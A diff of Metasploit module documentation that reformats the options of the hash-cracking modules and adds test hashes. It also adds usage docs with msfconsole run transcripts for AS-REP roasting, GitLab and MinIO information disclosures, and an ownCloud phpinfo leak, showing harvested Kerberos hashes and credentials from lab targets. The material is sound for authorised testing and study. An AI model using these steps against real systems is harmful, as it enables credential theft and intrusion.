-   Show the command being used run from the command line for debugging.  Default is `false`
+Show the command being used run from the command line for debugging.  Default is `false`

-   **USE_CREDS**
+### USE_CREDS

-   Use existing credential data saved in the database.  Default is `true`.
+Use existing credential data saved in the database.  Default is `true`.

-   **USE_DB_INFO**
+### USE_DB_INFO

-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.

-   **USE_DEFAULT_WORDLIST**
+### USE_DEFAULT_WORDLIST

-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
+Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+`true`.

-   **USE_HOSTNAMES**
+### USE_HOSTNAMES

   Seed the wordlist with hostnames from the workspace.  Default is `true`.

-   **USE_ROOT_WORDS**
+### USE_ROOT_WORDS

-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
+Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+is true.

-   **WORDLIST**
+### WORDLIST

-   Run the cracker in dictionary/wordlist mode.  Default is `true`
+Run the cracker in dictionary/wordlist mode.  Default is `true`

 ## Scenarios

@@ -141,7 +141,9 @@ The following is data which can be used to test integration, including adding en
 to a wordlist and pot file to test various aspects of the cracker.

 ```
-creds add user:androidsha1 hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-sha1
+creds add user:samsungsha1 hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-samsung-sha1
+creds add user:androidsha1 hash:9860A48CA459D054F3FEF0F8518CF6872923DAE2:81fcb23bcadd6c5 jtr:android-sha1
+creds add user:androidmd5 hash:1C0A0FDB673FBA36BEAEB078322C7393:81fcb23bcadd6c5 jtr:android-md5
 ```

 ### Hashcat
@@ -8,7 +8,7 @@
  * `PBKDF2-HMAC-SHA512` based passwords (10.8+)

 | Common             | John               | Hashcat |
-|--------------------|--------------------|---------|
+| ------------------ | ------------------ | ------- |
 | xsha               | xsha               | 122     |
 | xsha512            | xsha512            | 1722    |
 | pbkdf2-hmac-sha512 | pbkdf2-hmac-sha512 | 7100    |
@@ -27,54 +27,54 @@

 ## Actions

-   **john**
+### john

-   Use john the ripper (default).
+Use john the ripper (default).

-   **hashcat**
+### hashcat

-   Use hashcat.
+Use hashcat.

 ## Options

-   **CONFIG**
+### CONFIG

-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`

-   **CRACKER_PATH**
+### CRACKER_PATH

-   The absolute path to the cracker executable.  Default behavior is to search `path`.
+The absolute path to the cracker executable.  Default behavior is to search `path`.

-   **CUSTOM_WORDLIST**
+### CUSTOM_WORDLIST

-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.

-   **DeleteTempFiles**
+### DeleteTempFiles

-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.

-   **Fork**
+### Fork

-   This option will set how many forks to use on john the ripper.  Default is `1` (no forking).
+This option will set how many forks to use on john the ripper.  Default is `1` (no forking).

-   **INCREMENTAL**
+### INCREMENTAL

-   Run the cracker in incremental mode.  Default is `true`
+Run the cracker in incremental mode.  Default is `true`

-   **ITERATION_TIMEOUT**
+### ITERATION_TIMEOUT

-   The max-run-time for each iteration of cracking.
+The max-run-time for each iteration of cracking.

-   **KORELOGIC**
+### KORELOGIC

-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
+Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+Default is `false`.

-   **MUTATE**
+### MUTATE

-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+Apply common mutations to the Wordlist (SLOW).  Mutations are:

   * `'@' => 'a'`
   * `'0' => 'o'`
@@ -84,52 +84,52 @@
   * `'1' => 'l'`
   * `'5' => 's'`

-   Default is `false`.
+Default is `false`.

-   **PBKDF2-HMAC-SHA512**
+### PBKDF2-HMAC-SHA512

-   Crack SHA12 hashes. Default is `true`.
+Crack SHA12 hashes. Default is `true`.

-   **POT**
+### POT

-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
+The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+Default is `~/.msf4/john.pot`.

-   **SHOWCOMMAND**
+### SHOWCOMMAND

-   Show the command being used run from the command line for debugging.  Default is `false`
+Show the command being used run from the command line for debugging.  Default is `false`

-   **USE_CREDS**
+### USE_CREDS

-   Use existing credential data saved in the database.  Default is `true`.
+Use existing credential data saved in the database.  Default is `true`.

-   **USE_DB_INFO**
+### USE_DB_INFO

-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.

-   **USE_DEFAULT_WORDLIST**
+### USE_DEFAULT_WORDLIST

-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
+Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+`true`.

-   **USE_HOSTNAMES**
+### USE_HOSTNAMES

-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+Seed the wordlist with hostnames from the workspace.  Default is `true`.

-   **USE_ROOT_WORDS**
+### USE_ROOT_WORDS

-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
+Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+is true.

-   **WORDLIST**
+### WORDLIST

-   Run the cracker in dictionary/wordlist mode.  Default is `true`
+Run the cracker in dictionary/wordlist mode.  Default is `true`

-   **XSHA**
+### XSHA

-   Crack xsha based hashes. Default is `true`.
+Crack xsha based hashes. Default is `true`.

 ## Scenarios

@@ -8,7 +8,7 @@
  * `mediawiki` based passwords

 | Common    | John             | Hashcat |
-|-----------|------------------|-------- |
+| --------- | ---------------- | ------- |
 | atlassian | PBKDF2-HMAC-SHA1 | 12001   |
 | mediawiki | mediawiki        | 3711    |
 | phpass    | phpass           | 400     |
@@ -27,63 +27,63 @@

 ## Actions

-   **john**
+### john

-   Use john the ripper (default).
+Use john the ripper (default).

-   **hashcat**
+### hashcat

-   Use hashcat.
+Use hashcat.

 ## Options

-   **ATLASSIAN**
+### ATLASSIAN

-   Crack atlassian hashes. Default is `true`.
+Crack atlassian hashes. Default is `true`.

-   **CONFIG**
+### CONFIG

-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`


-   **CRACKER_PATH**
+### CRACKER_PATH

-   The absolute path to the cracker executable.  Default behavior is to search `path`.
+The absolute path to the cracker executable.  Default behavior is to search `path`.

-   **CUSTOM_WORDLIST**
+### CUSTOM_WORDLIST

-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.

-   **DeleteTempFiles**
+### DeleteTempFiles

-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.

-   **Fork**
+### Fork

-   This option will set how many forks to use on john the ripper.  Default is `1` (no forking).
+This option will set how many forks to use on john the ripper.  Default is `1` (no forking).

-   **INCREMENTAL**
+### INCREMENTAL

-   Run the cracker in incremental mode.  Default is `true`
+Run the cracker in incremental mode.  Default is `true`

-   **ITERATION_TIMEOUT**
+### ITERATION_TIMEOUT

-   The max-run-time for each iteration of cracking.
+The max-run-time for each iteration of cracking.

-   **KORELOGIC**
+### KORELOGIC

-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
+Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+Default is `false`.

-   **MEDIAWIKI**
+### MEDIAWIKI

-   Crack mediawiki hashes. Default is `true`.
+Crack mediawiki hashes. Default is `true`.

-   **MUTATE**
+### MUTATE

-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+Apply common mutations to the Wordlist (SLOW).  Mutations are:

   * `'@' => 'a'`
   * `'0' => 'o'`
@@ -93,48 +93,48 @@
   * `'1' => 'l'`
   * `'5' => 's'`

-   Default is `false`.
+Default is `false`.

-   **PHPASS**
+### PHPASS

-   Crack PHPASS hashes. Default is `true`.
+Crack PHPASS hashes. Default is `true`.

-   **POT**
+### POT

-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
+The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+Default is `~/.msf4/john.pot`.

-   **SHOWCOMMAND**
+### SHOWCOMMAND

-   Show the command being used run from the command line for debugging.  Default is `false`
+Show the command being used run from the command line for debugging.  Default is `false`

-   **USE_CREDS**
+### USE_CREDS

-   Use existing credential data saved in the database.  Default is `true`.
+Use existing credential data saved in the database.  Default is `true`.

-   **USE_DB_INFO**
+### USE_DB_INFO

-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.

-   **USE_DEFAULT_WORDLIST**
+### USE_DEFAULT_WORDLIST

-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
+Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+`true`.

-   **USE_HOSTNAMES**
+### USE_HOSTNAMES

-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+Seed the wordlist with hostnames from the workspace.  Default is `true`.

-   **USE_ROOT_WORDS**
+### USE_ROOT_WORDS

-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
+Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+is true.

-   **WORDLIST**
+### WORDLIST

-   Run the cracker in dictionary/wordlist mode.  Default is `true`
+Run the cracker in dictionary/wordlist mode.  Default is `true`

 ## Scenarios

@@ -5,18 +5,25 @@

  * `LANMAN` based passwords
  * `NTLM` based passwords
+  * `M$ CASH hashes (1 and 2)` based passwords
+  * `NETNTLM` and `NETNTLMV2` based passwords
+
+| Common    | John      | Hashcat |
+| --------- | --------- | ------- |
+| lanman    | lm        | 3000    |
+| ntlm      | nt        | 1000    |
+| mscash    | mscash    | 1100    |
+| mscash2   | mscash2   | 2100    |
+| netntlm   | netntlm   | 5500    |
+| netntlmv2 | netntlmv2 | 5600    |

-| Common | John     | Hashcat |
-|--------|----------|---------|
-| lanman | lm       | 3000    |
-| ntlm   | nt       | 1000    |

  Sources of hashes can be found here:
  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)

 ## Verification Steps

-  1. Have at least one user with an `ntlm`, or `lanman` password hash in the database
+  1. Have at least one user with an uncracked windows based password hash in the database
  2. Start msfconsole
  3. Do: ```use auxiliary/analyze/crack_windows```
  4. Do: set cracker of choice
@@ -25,58 +32,62 @@

 ## Actions

-   **john**
+### john

-   Use john the ripper (default).
+Use john the ripper (default).

-   **hashcat**
+### hashcat

-   Use hashcat.
+Use hashcat.

 ## Options

-   **CONFIG**
+### CONFIG

-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`

-   **CRACKER_PATH**
+### CRACKER_PATH

-   The absolute path to the cracker executable.  Default behavior is to search `path`.
+The absolute path to the cracker executable.  Default behavior is to search `path`.

-   **CUSTOM_WORDLIST**
+### CUSTOM_WORDLIST

-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.

-   **DeleteTempFiles**
+### DeleteTempFiles

-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.

-   **Fork**
+### Fork

-   This option will set how many forks to use on john the ripper.  Default is `1` (no forking).
+This option will set how many forks to use on john the ripper.  Default is `1` (no forking).

-   **INCREMENTAL**
+### INCREMENTAL

-   Run the cracker in incremental mode.  Default is `true`
+Run the cracker in incremental mode.  Default is `true`

-   **ITERATION_TIMEOUT**
+### ITERATION_TIMEOUT

-   The max-run-time for each iteration of cracking.
+The max-run-time for each iteration of cracking.

-   **KORELOGIC**
+### KORELOGIC

-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
+Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+Default is `false`.

-   **LANMAN**
+### LANMAN

-   Crack LANMAN hashes.  Default is `true`.
+Crack LANMAN hashes.  Default is `true`.

-   **MUTATE**
+### MSCASH

-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+Crack MSCASH hashes.  Default is `true`.
+
+### MUTATE
+
+Apply common mutations to the Wordlist (SLOW).  Mutations are:

   * `'@' => 'a'`
   * `'0' => 'o'`
@@ -86,48 +97,56 @@
   * `'1' => 'l'`
   * `'5' => 's'`

-   Default is `false`.
+Default is `false`.

-   **NTLM**
+### NETNTLM

-   Crack NTLM hashes.  Default is `true`.
+Crack NETNTLM hashes.  Default is `true`.

-   **POT**
+### NETNTLMV2

-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
+Crack NETNTLMV2 hashes.  Default is `true`.

-   **SHOWCOMMAND**
+### NTLM

-   Show the command being used run from the command line for debugging.  Default is `false`
+Crack NTLM hashes.  Default is `true`.

-   **USE_CREDS**
+### POT

-   Use existing credential data saved in the database.  Default is `true`.
+The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+Default is `~/.msf4/john.pot`.

-   **USE_DB_INFO**
+### SHOWCOMMAND

-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+Show the command being used run from the command line for debugging.  Default is `false`

-   **USE_DEFAULT_WORDLIST**
+### USE_CREDS

-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
+Use existing credential data saved in the database.  Default is `true`.

-   **USE_HOSTNAMES**
+### USE_DB_INFO

-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.

-   **USE_ROOT_WORDS**
+### USE_DEFAULT_WORDLIST

-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
+Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+`true`.

-   **WORDLIST**
+### USE_HOSTNAMES

-   Run the cracker in dictionary/wordlist mode.  Default is `true`
+Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+### USE_ROOT_WORDS
+
+Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+is `true`.
+
+### WORDLIST
+
+Run the cracker in dictionary/wordlist mode.  Default is `true`

 ## Scenarios

@@ -141,6 +160,11 @@ creds add user:lm_password ntlm:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb11
 creds add user:lm2_password ntlm:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c jtr:lm
 creds add user:lm2_pot_password ntlm:e52cac67419fafe2fafe108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c jtr:lm
 creds add user:nt_password ntlm:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c jtr:nt
+creds add user:u4-netntlm hash:u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c jtr:netntlm
+creds add user:admin hash:admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030 jtr:netntlmv2
+creds add user:mscash-hashcat hash:M$test1#64cd29e36a8431a2b111378564a10631 jtr:mscash
+creds add user:mscash2-hashcat hash:$DCC2$10240#tom#e4e938d12fe5974dc42a90120bd9c90f jtr:mscash2
+
 echo "" > /root/.msf4/john.pot
 echo "\$LM\$E52CAC67419FAFE2:passwor" >> /root/.msf4/john.pot
 echo "\$LM\$FAFE108F3FA6CB6D:d" >> /root/.msf4/john.pot
@@ -4,7 +4,7 @@ Provided AWS credentials, this module will call the authenticated API of Amazon
 instances accessible to the account. Once enumerated as SSM-enabled, the instances can be controlled using out-of-band
 WebSocket sessions provided by the AWS API (nominally, privileged out of the box). This module provides not only the API
 enumeration identifying EC2 instances accessible via SSM with given credentials, but enables session initiation for all
-identified targets (without requiring target-level credentials) using the CreateSession mixin option. The module also
+identified targets (without requiring target-level credentials) using the CreateSession datastore option. The module also
 provides an EC2 ID filter and a limiting throttle to prevent session stampedes or expensive messes.

 ## Verification Steps
@@ -0,0 +1,74 @@
+## ASREP-roast
+
+The `auxiliary/gather/asrep` module can be used to find users who have Pre-authentication disabled,
+and retrieve credentials that can be cracked using a hash-cracking tool.
+
+The following ACTIONS are supported:
+
+- **BRUTE_FORCE**: Make TGT requests for all usernames in a given file. This does not require
+  valid domain credentials.
+- **LDAP**: Request the set of users with pre-authentication disabled using an LDAP query, and
+  then request TGTs for these users.
+
+## Module usage
+
+- Start `msfconsole`
+- Do: `use auxiliary/gather/asrep`
+- Do: `run action=BRUTE_FORCE user_file=<file> rhost=<IP> domain=<FQDN> rhostname=<hostname>`
+- The module will attempt to request TGTs for each of the users in the file. This should not lock out accounts.
+  A crackable value will be displayed for all identified accounts.
+- Do: `run action=LDAP rhost=<IP> username=<LDAP_User> password=<LDAP_Password> domain=<FQDN> rhostname=<hostname>`
+- The module will use LDAP to request the users without pre-auth required, and request TGTs for these users.
+  A crackable value will be displayed for all identified accounts.
+
+## Options
+
+### DOMAIN
+The Fully Qualified Domain Name (FQDN). Ex: mydomain.local.
+
+### USER_FILE
+The file containing a list of usernames, each on a new line.
+
+### Rhostname
+
+The hostname of the domain controller. Must be accurate otherwise the module will silently fail, even if users exist without pre-auth required.
+
+### USE_RC4_HMAC
+Request a ticket with the lower-security, more easily crackable, RC4_HMAC encryption type. This is 
+usually preferable, but may be less stealthy.
+
+## Scenarios
+
+### Brute forcing users
+
+An example of brute forcing usernames, in the hope of finding one with pre-auth not required:
+
+```msf
+msf6 auxiliary(gather/asrep) > run action=BRUTE_FORCE user_file=/tmp/users.txt rhost=192.168.1.1 domain=msf.local rhostname=dc22
+[*] Running module against 192.168.1.1
+
+$krb5asrep$23$user@MSF.LOCAL:9fb9954fa32193185ab32e2de2ab9f13$bf14e834c661246cad302073c228e6ff7894cd3023665f0f84338432c3929922ae998c4a23bb9d163dda536a230d0503b2cf575389317b52bde782264940e80206a29e9613e47328228441cf013fb1f6672359f6799be97b962de9429e8859f437e53549be6b11ca07af6f09eae6cd78279af6d7f6dcdfd011eccb74b4aa753b2f9e6561c59c9408ee4bec983777908f3a7eef5fba977710e47e4e8ac0af10608a7dd23db506202b27d7892bc28426d2080c343edfe243bf1cae554cf6204733082332be2455e4674e1c3e84614818a6c15b54221dcaa832
+
+[*] Query returned 1 result.
+[*] Auxiliary module execution completed
+```
+
+### Using LDAP
+
+```
+msf6 auxiliary(gather/asrep) > run action=LDAP rhost=192.168.1.1 username=azureadmin password=password ldap::auth=kerberos domain=msf.local domaincontrollerrhost=192.168.1.1 rhostname=dc22
+[*] Running module against 192.168.1.1
+
+[+] 192.168.1.1:88 - Received a valid TGT-Response
+[*] 192.168.1.1:389 - TGT MIT Credential Cache ticket saved to /home/smash/.msf4/loot/20231124083018_default_192.168.1.1_mit.kerberos.cca_409871.bin
+[+] 192.168.1.1:88 - Received a valid TGS-Response
+[*] 192.168.1.1:389 - TGS MIT Credential Cache ticket saved to /home/smash/.msf4/loot/20231124083018_default_192.168.1.1_mit.kerberos.cca_923760.bin
+[+] 192.168.1.1:88 - Received a valid delegation TGS-Response
+[+] 192.168.1.1:389 Discovered base DN: DC=msf,DC=local
+[+] 192.168.1.1:389 Discovered schema DN: DC=msf,DC=local
+
+$krb5asrep$23$user@MSF.LOCAL:234e56b15bf3a0e3eb93d662ea6ded74$9889b0a449154c1353ea4db388af29381ad367771e2fe7d6a5644180e9f7ca0b1e836fc864f6d240e9ef91124edb13797dcb097f68c537279f80e3fc3c5c86f8f937af23bb2fd58274dd40ea184994cf31de50f508faac86c61749032b2d9e4ae4c74b0f76a0c242497e6765ddfba9c57743b19d4bb97aa3ef3b66cee50a1d3871b0b4ecd3f97d42781b6fb3d8839d8805ae1291d0e9ba07d374ed84ea39fadab548c2b40c87288b4465f234d0c3341e3b27c193a62a3ad7b0bdf04dbe5bf03815d48f766d1c727838f92dd36c437782975a978aefcb33e9
+
+[*] Query returned 1 result.
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,72 @@
+## Vulnerable Application
+
+Information disclosure affecting all versions of GitLab
+before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1
+by sending a GET request to the project URI and appending "-/tags"
+
+### Docker installation instructions can be found here:
+
+https://docs.gitlab.com/ee/install/docker.html
+
+Once installed, create a project. Once the project is
+created, add a new tag by expanding the Code menu item
+on the left, then selecting Tags. Then click on the 
+New Tag button in the top right corner.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use [module path]`
+1. Do: `set RHOSTS [IP]`
+1. Do: `run`
+1. You should receive output with user names and email addresses assocaited with project tags
+
+## Options
+
+### TARGETPROJECT
+
+This will gather information for ALL PUBLICLY ACCESSIBLE PROJECTS. IF you know the specific project you would
+like to target, you would need to set that here.
+
+## Scenarios
+### Scrape all Workspaces/Projects
+```
+msf6 > use auxiliary/gather/gitlab_tags_rss_info_disclosure 
+msf6 auxiliary(gather/gitlab_tags_rss_info_disclosure) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 auxiliary(gather/gitlab_tags_rss_info_disclosure) > run
+[*] Running module against 127.0.0.1
+
+[+] [2024.02.09-11:18:23] Scraping ALL projects...
+[*] [2024.02.09-11:18:23] Check RSS tags feed for: Workspace1/Project1
+[+] [2024.02.09-11:18:23] Output saved to /root/.msf4/loot/20240209111823_default_127.0.0.1_gitlab.RSS.info__010524.xml
+[+] [2024.02.09-11:18:23] name: john doe
+[+] [2024.02.09-11:18:23] e-mail: johndoe@example.com
+[*] [2024.02.09-11:18:23] Check RSS tags feed for: Workspace1/Project2
+[+] [2024.02.09-11:18:23] Output saved to /root/.msf4/loot/20240209111823_default_127.0.0.1_gitlab.RSS.info__822263.xml
+[+] [2024.02.09-11:18:23] name: janedoe
+[+] [2024.02.09-11:18:23] e-mail: janedoe@example.com
+[*] [2024.02.09-11:18:23] Check RSS tags feed for: ws2/proj1
+[-] [2024.02.09-11:18:23] No tags or authors found
+[*] [2024.02.09-11:18:23] Check RSS tags feed for: ws3/proj1
+[-] [2024.02.09-11:18:23] No tags or authors found
+[*] [2024.02.09-11:18:23] Check RSS tags feed for: ws3/proj2
+[-] [2024.02.09-11:18:23] No tags or authors found
+[*] Auxiliary module execution completed
+```
+### Specify Project
+```
+msf6 > use auxiliary/gather/gitlab_tags_rss_info_disclosure 
+msf6 auxiliary(gather/gitlab_tags_rss_info_disclosure) > set RHOSTS 127.0.0.1     
+msf6 auxiliary(gather/gitlab_tags_rss_info_disclosure) > set TARGETPROJECT Workspace1/Project1
+TARGETPROJECT => Workspace1/Project1
+msf6 auxiliary(gather/gitlab_tags_rss_info_disclosure) > run
+[*] Running module against 127.0.0.1
+
+[*] [2024.02.09-11:44:43] Check RSS tags feed for: Workspace1/Project1
+[+] [2024.02.09-11:44:43] Output saved to /root/.msf4/loot/20240209114443_default_127.0.0.1_gitlab.RSS.info__390983.xml
+[+] [2024.02.09-11:44:43] name: janedoe
+[+] [2024.02.09-11:44:43] e-mail: janedoe@example.com
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,47 @@
+## Vulnerable Application
+
+MinIO is a Multi-Cloud Object Storage framework. In a cluster deployment starting with
+RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns
+all environment variables, including `MINIO_SECRET_KEY` and `MINIO_ROOT_PASSWORD`,
+resulting in information disclosure.
+
+### Docker Image
+
+1. Download docker yml: https://raw.githubusercontent.com/vulhub/vulhub/master/minio/CVE-2023-28432/docker-compose.yml
+1. Execute `docker-compose up` inside the same directory containing the docker-compose.yml
+1. Then MinIO's login page should be available at http://127.0.0.1:9001/
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use auxiliary/gather/minio_bootstrap_verify_info_disc.rb`
+1. Do: `set rhost [IP]`
+1. Do: `run`
+1. You should get MinIO Environmental Variables
+
+## Options
+
+## Scenarios
+
+### MinIO 2023-02-27T18:10:45Z from docker image
+
+```
+resource (msf)> set rhost 127.0.0.1
+rhost => 127.0.0.1
+resource (msf)> set rport 9000
+rport => 9000
+msf6 auxiliary(gather/minio_bootstrap_verify_info_disc) > run
+[*] Reloading module...
+[*] Running module against 127.0.0.1
+
+[+] MINIO_ACCESS_KEY_FILE: access_key
+[+] MINIO_CONFIG_ENV_FILE: config.env
+[+] MINIO_KMS_SECRET_KEY_FILE: kms_master_key
+[+] MINIO_ROOT_PASSWORD: minioadmin-vulhub
+[+] MINIO_ROOT_PASSWORD_FILE: secret_key
+[+] MINIO_ROOT_USER: minioadmin
+[+] MINIO_ROOT_USER_FILE: access_key
+[+] MINIO_SECRET_KEY_FILE: secret_key
+[+] MinIO Environmental Variables Json Saved to: /root/.msf4/loot/20240131112953_default_127.0.0.1_minio.env.json_772811.json
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,162 @@
+## Vulnerable Application
+
+Docker containers of ownCloud compiled after February 2023, which have version 0.2.0 before 0.2.1 or 0.3.0 before 0.3.1 of the app `graph` installed
+contain a test file which prints `phpinfo()` to an unauthenticated user. A post file name must be appended to the URL to bypass the login filter.
+Docker may export sensitive environment variables including ownCloud, DB, redis, SMTP, and S3 credentials, as well as other host information.
+
+### Docker-Compose Build
+
+Using docker-compose we can build a fairly robust system with plenty of information to pilfer.
+
+Based off of [Ron Bowes Blog Post](https://www.labs.greynoise.io//grimoire/2023-11-29-owncloud-redux/)
+
+A list of environment variables is posted [here](https://github.com/owncloud-docker/base/blob/master/ENVIRONMENT.md#environment-variables)
+
+```
+version: "3"
+
+services:
+  owncloud:
+    image: owncloud/server:10.12.1
+    container_name: owncloud_server
+    restart: always
+    ports:
+      - 8080:8080
+    depends_on:
+      - mariadb
+      - redis
+    environment:
+      - OWNCLOUD_DOMAIN=localhost:8080
+      - OWNCLOUD_TRUSTED_DOMAINS=localhost
+      - OWNCLOUD_DB_TYPE=mysql
+      - OWNCLOUD_DB_NAME=owncloud
+      - OWNCLOUD_DB_USERNAME=owncloud
+      - OWNCLOUD_DB_PASSWORD=owncloud
+      - OWNCLOUD_DB_HOST=mariadb
+      - OWNCLOUD_ADMIN_USERNAME=admin_username
+      - OWNCLOUD_ADMIN_PASSWORD=admin_password
+      - OWNCLOUD_MYSQL_UTF8MB4=true
+      - OWNCLOUD_REDIS_ENABLED=true
+      - OWNCLOUD_REDIS_HOST=redis
+      - APACHE_LOG_LEVEL=trace6
